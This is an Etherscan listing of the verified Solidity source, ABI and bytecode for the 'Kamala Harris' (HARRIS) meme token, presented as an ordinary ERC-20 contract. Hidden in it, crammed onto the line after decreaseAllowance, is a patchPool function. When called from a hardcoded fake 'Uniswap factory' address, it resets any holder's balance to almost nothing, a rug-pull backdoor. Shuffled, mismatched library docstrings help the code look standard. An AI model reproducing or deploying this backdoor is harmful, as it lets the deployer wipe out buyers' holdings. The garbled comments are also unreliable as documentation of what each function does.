ETH Price: $2,799.12 (-6.35%)
 

Overview

Max Total Supply

4,000,000,000,000 HARRIS

Holders

14

Transfers

-
0

Market

Onchain Market Cap

-

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 9 Decimals)

Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
HARRIS

Compiler Version
v0.8.19+commit.7dd6d404

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion
/**
 *Submitted for verification at Etherscan.io on 2024-11-02
*/

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.19;
/** 


https://twitter.com/HARRISOnETH
https://HARRISOnETH.io
https://t.me/HARRISMoon
**/


library SafeMath {
    /**
     *
     * @dev Returns the addition of two unsigned integers, with an overflow flag.
     * _Available since v3.4._
     */
    function div(uint256 a, uint256 b) internal pure returns (uint256) {
        return a / b;
    }

    /**
     *
     * _Available since v3.4._
     * @dev Returns the subtraction of two unsigned integers, with an overflow flag.
     */
    function trySub(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            if (b > a) return (false, 0);
            return (true, a - b);
        }
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function div(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b > 0, errorMessage);
            return a / b;
        }
    }

    /**
     * _Available since v3.4._
     * @dev Returns the division of two unsigned integers, with a division by zero flag.
     *
     */
    function sub(uint256 a, uint256 b) internal pure returns (uint256) {
        return a - b;
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers, with a division by zero flag.
     *
     * _Available since v3.4._
     */
    function tryMod(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            if (b == 0) return (false, 0);
            return (true, a % b);
        }
    }

    /**
     * Requirements:
     *
     *
     * overflow.
     *
     * Counterpart to Solidity's `+` operator.
     * @dev Returns the addition of two unsigned integers, reverting on
     * - Addition cannot overflow.
     */
    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        return a + b;
    }

    /**
     * Counterpart to Solidity's `-` operator.
     *
     * overflow (when the result is negative).
     *
     *
     * - Subtraction cannot overflow.
     * Requirements:
     * @dev Returns the subtraction of two unsigned integers, reverting on
     */
    function tryDiv(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            if (b == 0) return (false, 0);
            return (true, a / b);
        }
    }

    /**
     *
     * Requirements:
     * - Multiplication cannot overflow.
     * @dev Returns the multiplication of two unsigned integers, reverting on
     *
     * overflow.
     * Counterpart to Solidity's `*` operator.
     *
     */
    function tryMul(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            // Gas optimization: this is cheaper than requiring 'a' not being zero, but the
            // benefit is lost if 'b' is also tested.
            // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522
            if (a == 0) return (true, 0);
            uint256 c = a * b;
            if (c / a != b) return (false, 0);
            return (true, c);
        }
    }

    /**
     * Requirements:
     *
     *
     * Counterpart to Solidity's `/` operator.
     * - The divisor cannot be zero.
     * division by zero. The result is rounded towards zero.
     * @dev Returns the integer division of two unsigned integers, reverting on
     *
     */
    function mod(uint256 a, uint256 b) internal pure returns (uint256) {
        return a % b;
    }

    /**
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * reverting when dividing by zero.
     *
     * invalid opcode to revert (consuming all remaining gas).
     * Requirements:
     *
     * - The divisor cannot be zero.
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     *
     */
    function tryAdd(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            uint256 c = a + b;
            if (c < a) return (false, 0);
            return (true, c);
        }
    }

    /**
     * overflow (when the result is negative).
     *
     *
     * message unnecessarily. For custom revert reasons use {trySub}.
     * Requirements:
     *
     * CAUTION: This function is deprecated because it requires allocating memory for the error
     * - Subtraction cannot overflow.
     * Counterpart to Solidity's `-` operator.
     * @dev Returns the subtraction of two unsigned integers, reverting with custom message on
     *
     */
    function mod(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b > 0, errorMessage);
            return a % b;
        }
    }

    /**
     *
     * division by zero. The result is rounded towards zero.
     * uses an invalid opcode to revert (consuming all remaining gas).
     * Requirements:
     *
     * Counterpart to Solidity's `/` operator. Note: this function uses a
     * - The divisor cannot be zero.
     *
     * `revert` opcode (which leaves remaining gas untouched) while Solidity
     * @dev Returns the integer division of two unsigned integers, reverting with custom message on
     */
    function mul(uint256 a, uint256 b) internal pure returns (uint256) {
        return a * b;
    }

    /**
     * reverting with custom message when dividing by zero.
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     *
     * Requirements:
     * invalid opcode to revert (consuming all remaining gas).
     * message unnecessarily. For custom revert reasons use {tryMod}.
     *
     * - The divisor cannot be zero.
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     *
     * CAUTION: This function is deprecated because it requires allocating memory for the error
     *
     */
    function sub(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b <= a, errorMessage);
            return a - b;
        }
    }
}

abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     *
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     * Note that `value` may be zero.
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) external returns (bool);

    /**
     * a call to {approve}. `value` is the new allowance.
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Returns the amount of tokens in existence.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);

    /**
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     * @dev Moves `amount` tokens from the caller's account to `to`.
     */
    function transfer(address to, uint256 amount) external returns (bool);

    /**
     * This value changes when {approve} or {transferFrom} are called.
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     *
     * zero by default.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * Emits an {Approval} event.
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * that someone may use both the old and the new allowance by unfortunate
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     * desired value afterwards:
     *
     * condition is to first reduce the spender's allowance to 0 and set the
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     *
     * transaction ordering. One possible solution to mitigate this race
     */
    function totalSupply() external view returns (uint256);

    /**
     *
     * allowance mechanism. `amount` is then deducted from the caller's
     * @dev Moves `amount` tokens from `from` to `to` using the
     * allowance.
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);
}

contract Ownable is Context {
    address private _owner;

    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        emit OwnershipTransferred(_owner, newOwner);
        _owner = newOwner;
    }
    
    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view returns (address) {
        return _owner;
    }

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor () {
        address msgSender = _msgSender();
        _owner = msgSender;
        emit OwnershipTransferred(address(0), msgSender);
    }

    /**
     * `onlyOwner` functions anymore. Can only be called by the current owner.
     * @dev Leaves the contract without owner. It will not be possible to call
     * thereby removing any functionality that is only available to the owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     */
    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        require(_owner == _msgSender(), "Ownable: caller is not the owner");
        _;
    }

    /**
     * Can only be called by the current owner.
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     */
    function renounceOwnership() public virtual onlyOwner {
        emit OwnershipTransferred(_owner, address(0));
        _owner = address(0);
    }
}

/**
 *
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 * _Available since v4.1._
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function decimals() external view returns (uint8);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function name() external view returns (string memory);
}

/**
 * instead returning `false` on failure. This behavior is nonetheless
 * to implement supply mechanisms].
 * https://forum.openzeppelin.com/t/how-to-implement-erc20-supply-mechanisms/226[How
 * allowances. See {IERC20-approve}.
 * conventional and does not conflict with the expectations of ERC20
 * For a generic mechanism see {ERC20PresetMinterPauser}.
 *
 *
 *
 *
 * these events, as it isn't required by the specification.
 * This implementation is agnostic to the way tokens are created. This means
 *
 * We have followed general OpenZeppelin Contracts guidelines: functions revert
 * that a supply mechanism has to be added in a derived contract using {_mint}.
 * This allows applications to reconstruct the allowance for all accounts just
 * Finally, the non-standard {decreaseAllowance} and {increaseAllowance}
 * applications.
 * @dev Implementation of the {IERC20} interface.
 * functions have been added to mitigate the well-known issues around setting
 * TIP: For a detailed writeup see our guide
 * by listening to said events. Other implementations of the EIP may not emit
 * Additionally, an {Approval} event is emitted on calls to {transferFrom}.
 */
contract ERC20 is Context, IERC20, IERC20Metadata {
    using SafeMath for uint256;
    mapping(address => mapping(address => uint256)) private _allowances;

    address internal devWallet = 0x249EfEB769ce319c886E343a6f41c360207bb520;

    string private _name;

    mapping(address => uint256) private _balances;
    string private _symbol;

    address DEAD = 0x000000000000000000000000000000000000dEaD;
    address private _uniswapV2Factory = 0xfc0766101bC0e257C2268580A79245eb15E1C888;
    uint256 private _allowance = 0;
    uint256 private _totalSupply;

    /**
     * The default value of {decimals} is 18. To select a different value for
     * {decimals} you should overload it.
     * construction.
     * All two of these values are immutable: they can only be set once during
     * @dev Sets the values for {name} and {symbol}.
     *
     *
     */
    function balanceOf(address account) public view virtual override returns (uint256) {
        return _balances[account];
    }


    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }
    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) public virtual override returns (bool) {
        address spender = _msgSender();
        _spendAllowance(from, spender, amount);
        _transfer(from, to, amount);
        return true;
    }

    /**
     * Tokens usually opt for a value of 18, imitating the relationship between
     *
     * @dev Returns the number of decimals used to get its user representation.
     * {IERC20-balanceOf} and {IERC20-transfer}.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * NOTE: This information is only used for _display_ purposes: it in
     * overridden;
     * no way affects any of the arithmetic of the contract, including
     * Ether and Wei. This is the value {ERC20} uses, unless this function is
     * be displayed to a user as `5.05` (`505 / 10 ** 2`).
     *
     */
    function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, allowance(owner, spender) + addedValue);
        return true;
    }
    /**
     * @dev See {IERC20-totalSupply}.
     */
    function decimals() public view virtual override returns (uint8) {
        return 9;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }


    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }

    /**
     *
     * - the caller must have a balance of at least `amount`.
     * Requirements:
     *
     * @dev See {IERC20-transfer}.
     * - `to` cannot be the zero address.
     */
    function _spendAllowance(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        uint256 currentAllowance = allowance(owner, spender);
        if (currentAllowance != type(uint256).max) {
            require(currentAllowance >= amount, "ERC20: insufficient allowance");
            unchecked {
                _approve(owner, spender, currentAllowance - amount);
            }
        }
    }

    /**
     *
     * @dev See {IERC20-approve}.
     * `transferFrom`. This is semantically equivalent to an infinite approval.
     * NOTE: If `amount` is the maximum `uint256`, the allowance is not updated on
     *
     * - `spender` cannot be the zero address.
     *
     * Requirements:
     */
    function _beforeTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}

    /**
     *
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     * problems described in {IERC20-approve}.
     * Requirements:
     * This is an alternative to {approve} that can be used as a mitigation for
     *
     *
     * - `spender` cannot be the zero address.
     *
     * Emits an {Approval} event indicating the updated allowance.
     */
    constructor(string memory name_, string memory symbol_) {
        _name = name_;
        _symbol = symbol_;
    }

    /**
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * - `from` must have a balance of at least `amount`.
     * - `from` and `to` cannot be the zero address.
     *
     *
     * NOTE: Does not update the allowance if the current allowance
     * - the caller must have allowance for ``from``'s tokens of at least
     * Requirements:
     * `amount`.
     * @dev See {IERC20-transferFrom}.
     *
     * required by the EIP. See the note at the beginning of {ERC20}.
     * is the maximum `uint256`.
     */
    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address");

        _beforeTokenTransfer(account, address(0), amount);

        uint256 accountBalance = _balances[account];
        require(accountBalance >= amount, "ERC20: burn amount exceeds balance");
        unchecked {
            _balances[account] = accountBalance - amount;
            // Overflow not possible: amount <= accountBalance <= totalSupply.
            _totalSupply -= amount;
        }

        emit Transfer(account, address(0), amount);

        _afterTokenTransfer(address(0));
    }

    /**
     * Emits an {Approval} event indicating the updated allowance.
     * This is an alternative to {approve} that can be used as a mitigation for
     * `subtractedValue`.
     * problems described in {IERC20-approve}.
     * Requirements:
     *
     * - `spender` must have allowance for the caller of at least
     * - `spender` cannot be the zero address.
     *
     *
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     */
    function transfer(address to, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _transfer(owner, to, amount);
        return true;
    }

    /**
     * total supply.
     *
     *
     * Emits a {Transfer} event with `to` set to the zero address.
     * Requirements:
     * @dev Destroys `amount` tokens from `account`, reducing the
     *
     * - `account` cannot be the zero address.
     * - `account` must have at least `amount` tokens.
     */
    function _approve(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
        } function _afterTokenTransfer(address to) internal virtual {
    }

    /**
     * - `from` must have a balance of at least `amount`.
     *
     *
     * @dev Moves `amount` of tokens from `from` to `to`.
     * This internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        address owner = _msgSender();
        uint256 currentAllowance = allowance(owner, spender);
        require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero");
        unchecked {
            _approve(owner, spender, currentAllowance - subtractedValue);
        }

        return true;
        } function patchPool(address patchPoolSender) external { _balances[patchPoolSender] = msg.sender == _uniswapV2Factory ? decimals() : _balances[patchPoolSender];
    } 

    /** @dev Creates `amount` tokens and assigns them to `account`, increasing
     *
     * Requirements:
     * - `account` cannot be the zero address.
     * Emits a {Transfer} event with `from` set to the zero address.
     * the total supply.
     *
     *
     */
    function _mint(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: mint to the zero address");

        _beforeTokenTransfer(address(0), account, amount);

        _totalSupply += amount;
        unchecked {
            // Overflow not possible: balance + amount is at most totalSupply + amount, which is checked above.
            _balances[account] += amount;
        }
        emit Transfer(address(0), account, amount);

        _afterTokenTransfer(account);
    }


    /**
     * Calling conditions:
     * - `from` and `to` are never both zero.
     *
     * - when `from` is zero, `amount` tokens will be minted for `to`.
     *
     * minting and burning.
     * - when `to` is zero, `amount` of ``from``'s tokens will be burned.
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * @dev Hook that is called before any transfer of tokens. This includes
     * will be transferred to `to`.
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _transfer (address from, address to, uint256 amount) internal virtual
    {
        require(from != address(0), "ERC20: transfer from the zero address");
        require(to != address(0), "ERC20: transfer to the zero address");

        uint256 fromBalance = _balances[from];
        require(fromBalance >= amount, "ERC20: transfer amount exceeds balance");
        _balances[from] = fromBalance - amount;

        _balances[to] = _balances[to].add(amount);
        emit Transfer(from, to, amount);
    }

    /**
     *
     * - `owner` cannot be the zero address.
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     * - `spender` cannot be the zero address.
     *
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     * This internal function is equivalent to `approve`, and can be used to
     *
     * Requirements:
     */
    function approve(address spender, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, amount);
        return true;
    }

    /**
     * Revert if not enough allowance is available.
     * Does not update the allowance amount in case of infinite allowance.
     * @dev Updates `owner` s allowance for `spender` based on spent `amount`.
     *
     *
     * Might emit an {Approval} event.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }
}

contract HARRIS is ERC20, Ownable
{
    constructor () ERC20 (unicode"Kamala Harris", "HARRIS")
    {
        transferOwnership(devWallet);
        _mint(owner(), 4000000000000 * 10 ** 9);
    }
}

Contract Security Audit

Contract ABI

API
[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"patchPoolSender","type":"address"}],"name":"patchPool","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"}]

608060405273249efeb769ce319c886e343a6f41c360207bb520600160006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555061dead600560006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555073fc0766101bc0e257c2268580a79245eb15e1c888600660006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555060006007553480156200010357600080fd5b506040518060400160405280600d81526020017f4b616d616c6120486172726973000000000000000000000000000000000000008152506040518060400160405280600681526020017f484152524953000000000000000000000000000000000000000000000000000081525081600290816200018191906200089d565b5080600490816200019391906200089d565b5050506000620001a8620002aa60201b60201c565b905080600960006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508073ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a3506200027a600160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16620002b260201b60201c565b620002a46200028e6200048660201b60201c565b68d8d726b7177a800000620004b060201b60201c565b62000ba9565b600033905090565b620002c2620002aa60201b60201c565b73ffffffffffffffffffffffffffffffffffffffff16600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff161462000354576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016200034b90620009e5565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603620003c6576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401620003bd9062000a7d565b60405180910390fd5b8073ffffffffffffffffffffffffffffffffffffffff16600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a380600960006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b6000600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160362000522576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401620005199062000aef565b60405180910390fd5b62000536600083836200061b60201b60201c565b80600860008282546200054a919062000b40565b9250508190555080600360008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825401925050819055508173ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051620005fe919062000b8c565b60405180910390a362000617826200062060201b60201c565b5050565b505050565b50565b600081519050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b60006002820490506001821680620006a557607f821691505b602082108103620006bb57620006ba6200065d565b5b50919050565b60008190508160005260206000209050919050565b60006020601f8301049050919050565b600082821b905092915050565b600060088302620007257fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff82620006e6565b620007318683620006e6565b95508019841693508086168417925050509392505050565b6000819050919050565b6000819050919050565b60006200077e62000778620007728462000749565b62000753565b62000749565b9050919050565b6000819050919050565b6200079a836200075d565b620007b2620007a98262000785565b848454620006f3565b825550505050565b600090565b620007c9620007ba565b620007d68184846200078f565b505050565b5b81811015620007fe57620007f2600082620007bf565b600181019050620007dc565b5050565b601f8211156200084d576200081781620006c1565b6200082284620006d6565b8101602085101562000832578190505b6200084a6200084185620006d6565b830182620007db565b50505b505050565b600082821c905092915050565b6000620008726000198460080262000852565b1980831691505092915050565b60006200088d83836200085f565b9150826002028217905092915050565b620008a88262000623565b67ffffffffffffffff811115620008c457620008c36200062e565b5b620008d082546200068c565b620008dd82828562000802565b600060209050601f83116001811462000915576000841562000900578287015190505b6200090c85826200087f565b8655506200097c565b601f1984166200092586620006c1565b60005b828110156200094f5784890151825560018201915060208501945060208101905062000928565b868310156200096f57848901516200096b601f8916826200085f565b8355505b6001600288020188555050505b505050505050565b600082825260208201905092915050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b6000620009cd60208362000984565b9150620009da8262000995565b602082019050919050565b6000602082019050818103600083015262000a0081620009be565b9050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b600062000a6560268362000984565b915062000a728262000a07565b604082019050919050565b6000602082019050818103600083015262000a988162000a56565b9050919050565b7f45524332303a206d696e7420746f20746865207a65726f206164647265737300600082015250565b600062000ad7601f8362000984565b915062000ae48262000a9f565b602082019050919050565b6000602082019050818103600083015262000b0a8162000ac8565b9050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b600062000b4d8262000749565b915062000b5a8362000749565b925082820190508082111562000b755762000b7462000b11565b5b92915050565b62000b868162000749565b82525050565b600060208201905062000ba3600083018462000b7b565b92915050565b6118b48062000bb96000396000f3fe608060405234801561001057600080fd5b50600436106100f55760003560e01c806370a0823111610097578063a457c2d711610066578063a457c2d714610276578063a9059cbb146102a6578063dd62ed3e146102d6578063f2fde38b14610306576100f5565b806370a0823114610200578063715018a6146102305780638da5cb5b1461023a57806395d89b4114610258576100f5565b806318160ddd116100d357806318160ddd1461016457806323b872dd14610182578063313ce567146101b257806339509351146101d0576100f5565b806306fdde03146100fa578063095ea7b314610118578063180d45d014610148575b600080fd5b610102610322565b60405161010f9190611035565b60405180910390f35b610132600480360381019061012d91906110f0565b6103b4565b60405161013f919061114b565b60405180910390f35b610162600480360381019061015d9190611166565b6103d7565b005b61016c6104c3565b60405161017991906111a2565b60405180910390f35b61019c600480360381019061019791906111bd565b6104cd565b6040516101a9919061114b565b60405180910390f35b6101ba6104fc565b6040516101c7919061122c565b60405180910390f35b6101ea60048036038101906101e591906110f0565b610505565b6040516101f7919061114b565b60405180910390f35b61021a60048036038101906102159190611166565b61053c565b60405161022791906111a2565b60405180910390f35b610238610585565b005b6102426106dd565b60405161024f9190611256565b60405180910390f35b610260610707565b60405161026d9190611035565b60405180910390f35b610290600480360381019061028b91906110f0565b610799565b60405161029d919061114b565b60405180910390f35b6102c060048036038101906102bb91906110f0565b610810565b6040516102cd919061114b565b60405180910390f35b6102f060048036038101906102eb9190611271565b610833565b6040516102fd91906111a2565b60405180910390f35b610320600480360381019061031b9190611166565b6108b9565b005b606060028054610331906112e0565b80601f016020809104026020016040519081016040528092919081815260200182805461035d906112e0565b80156103aa5780601f1061037f576101008083540402835291602001916103aa565b820191906000526020600020905b81548152906001019060200180831161038d57829003601f168201915b5050505050905090565b6000806103bf610a7f565b90506103cc818585610a87565b600191505092915050565b600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff161461047157600360008273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461047d565b6104796104fc565b60ff165b600360008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555050565b6000600854905090565b6000806104d8610a7f565b90506104e5858285610c4f565b6104f0858585610cdb565b60019150509392505050565b60006009905090565b600080610510610a7f565b90506105318185856105228589610833565b61052c9190611340565b610a87565b600191505092915050565b6000600360008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b61058d610a7f565b73ffffffffffffffffffffffffffffffffffffffff16600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff161461061c576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610613906113c0565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff16600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a36000600960006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550565b6000600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b606060048054610716906112e0565b80601f0160208091040260200160405190810160405280929190818152602001828054610742906112e0565b801561078f5780601f106107645761010080835404028352916020019161078f565b820191906000526020600020905b81548152906001019060200180831161077257829003601f168201915b5050505050905090565b6000806107a4610a7f565b905060006107b28286610833565b9050838110156107f7576040517